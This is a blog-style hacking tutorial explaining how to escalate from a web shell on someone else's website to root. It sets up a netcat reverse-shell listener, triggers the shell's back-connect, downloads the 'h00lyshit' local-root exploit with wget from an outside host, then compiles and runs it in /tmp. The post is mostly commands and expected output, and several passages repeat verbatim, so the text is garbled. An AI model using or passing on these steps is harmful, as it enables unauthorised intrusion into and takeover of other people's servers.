Sometimes people ask JRH that how to root a server. Here I give a complete tutorial on that. It is first tested by me on a site but I only test as I don't like to deface. Because as I know how it is difficult to make a webstie as I also work as an Web Developer.
Now Let's Start:
Requirements for this tutorial:
- A shelled website.
- NetCat installed on your computer.
- Patience
- Port 443 or any other except 80 opened on your router.
Okay, first let's navigate to our shell.
- A shelled website.
- NetCat installed on your computer.
- Patience
- Port 443 or any other except 80 opened on your router.
Okay, first let's navigate to our shell.
If the shell is GNY, you will see something like 'Back Connect'.
Go there. Now you see 3 textboxes.
Bind to bin/shor backconnect.
Type in your IP and the port you want the server to connect (it must be opened on your router.).
Now do not press backconnect yet.
Download NetCat From Here:
Extract the files to your desktop in a folder. Now go to Run>cmd. Open cmd.
Now type:
cd
Replace with the path of netcat. Okay, now type:
nc -lnvp
Replace with the port you opened and used on the shell.
Now it should display something like this:
Listening on port [any] ...
Minimze this window, and go on the web shell.
cd
Replace with the path of netcat. Okay, now type:
nc -lnvp
Replace with the port you opened and used on the shell.
Now it should display something like this:
Listening on port [any] ...
Minimze this window, and go on the web shell.
Type in your IP address and port, click backconnect.
If you did all right, and the server does not have a firewall and if your ports are forwarded correctly, you should see an incoming connection from the server. You have a shell!
Now you can type 'id' to see your current ID.
Let's say your ID is 23. You have control over your website only. But not for long. Now type 'uname -a'. You will get the full kernel version.
Simply copy it and google for local root exploits.
Let's say it is 2.6.18 2008 version... Hmm that is pretty outdated! Well, let's exploit it. Cd to the tmp directory, that is always writeable.
Type this:
cd /tmp
Now let's make a folder for the exploit.
mkdir exploit
cd into this folder.
cd exploit
Now comes the tricky part. We will use h00lyshit exploit for this kernel. Type:
wget http://goodbye.fileave.com/localroot.c
Now type 'ls'. You should see localroot.c in this folder. We need to compile it.
Type this:
cd /tmp
Now let's make a folder for the exploit.
mkdir exploit
cd into this folder.
cd exploit
Now comes the tricky part. We will use h00lyshit exploit for this kernel. Type:
wget http://goodbye.fileave.com/localroot.c
Now type 'ls'. You should see localroot.c in this folder. We need to compile it.
Type:
gcc localroot.c -o h00lyshit
Now type 'ls' and you should see 2 files, localroot.c and h00lyshit. h00lyshit requires a large file on the server in order to get root access, so let's create one. Type this and hit enter:
dd if=/dev/urandom of=largefile count=2M
This will create a large file, where largefile is the name of it. This can take up to 5 minutes. Once ready, chmod hoolyshit and largefile to 777, so:
chmod 777 h00lyshit
chmod 777 largefile
Now let's run the exploit! Type this:
./h00lyshit largefile
Now wait, wait for about 3 minutes. If the kernel is not patched and if it is the right version, you are root! Type 'id' and you will see:
uid=0(root)
You have successfully gained root!
gcc localroot.c -o h00lyshit
Now type 'ls' and you should see 2 files, localroot.c and h00lyshit. h00lyshit requires a large file on the server in order to get root access, so let's create one. Type this and hit enter:
dd if=/dev/urandom of=largefile count=2M
This will create a large file, where largefile is the name of it. This can take up to 5 minutes. Once ready, chmod hoolyshit and largefile to 777, so:
chmod 777 h00lyshit
chmod 777 largefile
Now let's run the exploit! Type this:
./h00lyshit largefile
Now wait, wait for about 3 minutes. If the kernel is not patched and if it is the right version, you are root! Type 'id' and you will see:
uid=0(root)
You have successfully gained root!
Collected.
Asked to Join JRH Idea Hacker Group in Facebook
কোন মন্তব্য নেই:
একটি মন্তব্য পোস্ট করুন